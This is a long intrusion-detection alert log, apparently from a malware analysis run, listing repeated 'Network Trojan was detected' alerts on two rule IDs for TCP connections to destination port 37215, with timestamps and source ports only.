          Timestamp:05/28/24-14:46:56.217097
          SID:2829579
          Source Port:43940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745679
          SID:2835222
          Source Port:56446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.092702
          SID:2835222
          Source Port:55522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.434226
          SID:2835222
          Source Port:49418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.948674
          SID:2835222
          Source Port:43666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778922
          SID:2835222
          Source Port:45300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743504
          SID:2829579
          Source Port:42204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.987832
          SID:2835222
          Source Port:56482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.373605
          SID:2835222
          Source Port:58852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668060
          SID:2829579
          Source Port:36578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066223
          SID:2829579
          Source Port:53276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.707659
          SID:2829579
          Source Port:58878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269599
          SID:2829579
          Source Port:33328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.068468
          SID:2835222
          Source Port:35666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650124
          SID:2835222
          Source Port:45448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590701
          SID:2835222
          Source Port:38828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845769
          SID:2835222
          Source Port:34356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267613
          SID:2835222
          Source Port:46142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594519
          SID:2829579
          Source Port:49746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689903
          SID:2835222
          Source Port:58146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125842
          SID:2829579
          Source Port:36818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551117
          SID:2829579
          Source Port:34314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797200
          SID:2829579
          Source Port:40790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.604287
          SID:2829579
          Source Port:53152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299673
          SID:2829579
          Source Port:52376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794123
          SID:2835222
          Source Port:55636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473736
          SID:2835222
          Source Port:46088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923490
          SID:2829579
          Source Port:37002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.441499
          SID:2829579
          Source Port:40820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061138
          SID:2835222
          Source Port:41810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.681248
          SID:2829579
          Source Port:40636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.684562
          SID:2835222
          Source Port:44944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.856257
          SID:2829579
          Source Port:44990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987334
          SID:2835222
          Source Port:45484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.372592
          SID:2835222
          Source Port:58624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890997
          SID:2835222
          Source Port:59590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.965184
          SID:2835222
          Source Port:44384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893437
          SID:2829579
          Source Port:35948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326057
          SID:2835222
          Source Port:46840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472599
          SID:2835222
          Source Port:33876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266479
          SID:2835222
          Source Port:49412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473294
          SID:2829579
          Source Port:39348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.366353
          SID:2829579
          Source Port:60126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.473653
          SID:2835222
          Source Port:43274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298419
          SID:2835222
          Source Port:41170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.655798
          SID:2835222
          Source Port:56338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.296283
          SID:2835222
          Source Port:55190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594493
          SID:2835222
          Source Port:49968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849285
          SID:2829579
          Source Port:32964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680358
          SID:2835222
          Source Port:60912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473732
          SID:2835222
          Source Port:52326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196618
          SID:2829579
          Source Port:48794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778196
          SID:2835222
          Source Port:34640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474735
          SID:2835222
          Source Port:41254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.804862
          SID:2835222
          Source Port:52474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125675
          SID:2835222
          Source Port:56346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985199
          SID:2829579
          Source Port:53392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065722
          SID:2835222
          Source Port:37162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.719111
          SID:2829579
          Source Port:47168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.894020
          SID:2829579
          Source Port:33768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.294758
          SID:2835222
          Source Port:47694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.932665
          SID:2835222
          Source Port:41536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322838
          SID:2829579
          Source Port:58688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841328
          SID:2829579
          Source Port:50128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273190
          SID:2835222
          Source Port:59938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.238149
          SID:2829579
          Source Port:53388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.713484
          SID:2835222
          Source Port:38726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547549
          SID:2829579
          Source Port:52128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350447
          SID:2829579
          Source Port:57808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.470924
          SID:2829579
          Source Port:53576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.632104
          SID:2829579
          Source Port:55222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592920
          SID:2835222
          Source Port:47496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.689908
          SID:2829579
          Source Port:44878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.665115
          SID:2835222
          Source Port:47804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202854
          SID:2835222
          Source Port:40562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.239623
          SID:2829579
          Source Port:45022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.491302
          SID:2835222
          Source Port:60314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.280932
          SID:2835222
          Source Port:34376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.538834
          SID:2829579
          Source Port:41232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146377
          SID:2835222
          Source Port:45644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497660
          SID:2829579
          Source Port:57790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299576
          SID:2835222
          Source Port:54850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178472
          SID:2829579
          Source Port:55322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328535
          SID:2835222
          Source Port:43472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462651
          SID:2835222
          Source Port:36996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.246725
          SID:2829579
          Source Port:48710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325761
          SID:2829579
          Source Port:36634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960199
          SID:2835222
          Source Port:52282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.207416
          SID:2835222
          Source Port:37952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.811662
          SID:2835222
          Source Port:52726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.974011
          SID:2835222
          Source Port:55428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588938
          SID:2835222
          Source Port:36030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.365165
          SID:2829579
          Source Port:48844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291497
          SID:2829579
          Source Port:52986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201804
          SID:2829579
          Source Port:58110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.982884
          SID:2835222
          Source Port:53916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651421
          SID:2835222
          Source Port:55100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136068
          SID:2835222
          Source Port:45772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.157914
          SID:2829579
          Source Port:34838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561035
          SID:2829579
          Source Port:48994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350485
          SID:2829579
          Source Port:60328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592108
          SID:2829579
          Source Port:53324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.713420
          SID:2835222
          Source Port:56666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287853
          SID:2829579
          Source Port:56578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.232770
          SID:2835222
          Source Port:34456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710212
          SID:2829579
          Source Port:44036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.045896
          SID:2829579
          Source Port:45746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216321
          SID:2829579
          Source Port:60254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.265790
          SID:2829579
          Source Port:50352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878777
          SID:2829579
          Source Port:48816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.665205
          SID:2835222
          Source Port:49182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.924092
          SID:2829579
          Source Port:51574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542352
          SID:2829579
          Source Port:37082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326589
          SID:2829579
          Source Port:49998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326695
          SID:2835222
          Source Port:53034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062871
          SID:2829579
          Source Port:48558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272342
          SID:2829579
          Source Port:51262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988939
          SID:2835222
          Source Port:57550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229425
          SID:2829579
          Source Port:58308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.664325
          SID:2829579
          Source Port:36126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291697
          SID:2835222
          Source Port:37142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287723
          SID:2829579
          Source Port:42990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473355
          SID:2835222
          Source Port:33354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291531
          SID:2829579
          Source Port:50438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.356837
          SID:2835222
          Source Port:43984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.305196
          SID:2835222
          Source Port:45970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.675367
          SID:2829579
          Source Port:60132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272674
          SID:2829579
          Source Port:32994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922990
          SID:2835222
          Source Port:42000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.038559
          SID:2835222
          Source Port:40122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115468
          SID:2829579
          Source Port:35330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.491394
          SID:2829579
          Source Port:45676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298491
          SID:2835222
          Source Port:33712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.921273
          SID:2829579
          Source Port:53478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893366
          SID:2829579
          Source Port:56536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299523
          SID:2829579
          Source Port:58016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.296167
          SID:2835222
          Source Port:36596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266710
          SID:2829579
          Source Port:40682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.681193
          SID:2835222
          Source Port:58880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.991782
          SID:2829579
          Source Port:55992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287547
          SID:2835222
          Source Port:50110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.341788
          SID:2835222
          Source Port:38304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.771995
          SID:2835222
          Source Port:39540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.319101
          SID:2835222
          Source Port:52766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399209
          SID:2835222
          Source Port:54566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.851560
          SID:2835222
          Source Port:54924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475581
          SID:2835222
          Source Port:56482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337194
          SID:2835222
          Source Port:48970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.851560
          SID:2835222
          Source Port:33868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476378
          SID:2829579
          Source Port:34880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668061
          SID:2829579
          Source Port:50592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.151094
          SID:2835222
          Source Port:39424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992338
          SID:2835222
          Source Port:33302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142830
          SID:2835222
          Source Port:33802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327847
          SID:2835222
          Source Port:55466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.622224
          SID:2835222
          Source Port:46906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271976
          SID:2829579
          Source Port:51042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.162328
          SID:2829579
          Source Port:32920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466616
          SID:2829579
          Source Port:37394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708374
          SID:2829579
          Source Port:51650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941664
          SID:2829579
          Source Port:49190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.175479
          SID:2829579
          Source Port:41506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.244677
          SID:2829579
          Source Port:41538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185871
          SID:2835222
          Source Port:37698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797895
          SID:2835222
          Source Port:52304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.927769
          SID:2835222
          Source Port:56356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.092717
          SID:2835222
          Source Port:53788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.492931
          SID:2835222
          Source Port:58318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.431568
          SID:2829579
          Source Port:49906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841152
          SID:2829579
          Source Port:47012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125723
          SID:2829579
          Source Port:48304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116657
          SID:2829579
          Source Port:44430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.772726
          SID:2835222
          Source Port:37460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.685007
          SID:2835222
          Source Port:34894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.593138
          SID:2829579
          Source Port:46674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680315
          SID:2835222
          Source Port:48694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594579
          SID:2835222
          Source Port:43058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.544071
          SID:2835222
          Source Port:43458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267611
          SID:2835222
          Source Port:56234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.492697
          SID:2835222
          Source Port:58678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177547
          SID:2829579
          Source Port:33846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067258
          SID:2835222
          Source Port:38896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923488
          SID:2829579
          Source Port:44410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594833
          SID:2829579
          Source Port:53874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126804
          SID:2835222
          Source Port:40048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739790
          SID:2829579
          Source Port:35858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293111
          SID:2835222
          Source Port:52570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.866041
          SID:2835222
          Source Port:35500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039384
          SID:2835222
          Source Port:50674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.913286
          SID:2829579
          Source Port:38174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794919
          SID:2829579
          Source Port:41406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.852627
          SID:2829579
          Source Port:47166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.993660
          SID:2829579
          Source Port:36774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.940980
          SID:2829579
          Source Port:60206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547518
          SID:2829579
          Source Port:33712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605629
          SID:2835222
          Source Port:55488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855618
          SID:2835222
          Source Port:35278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.677734
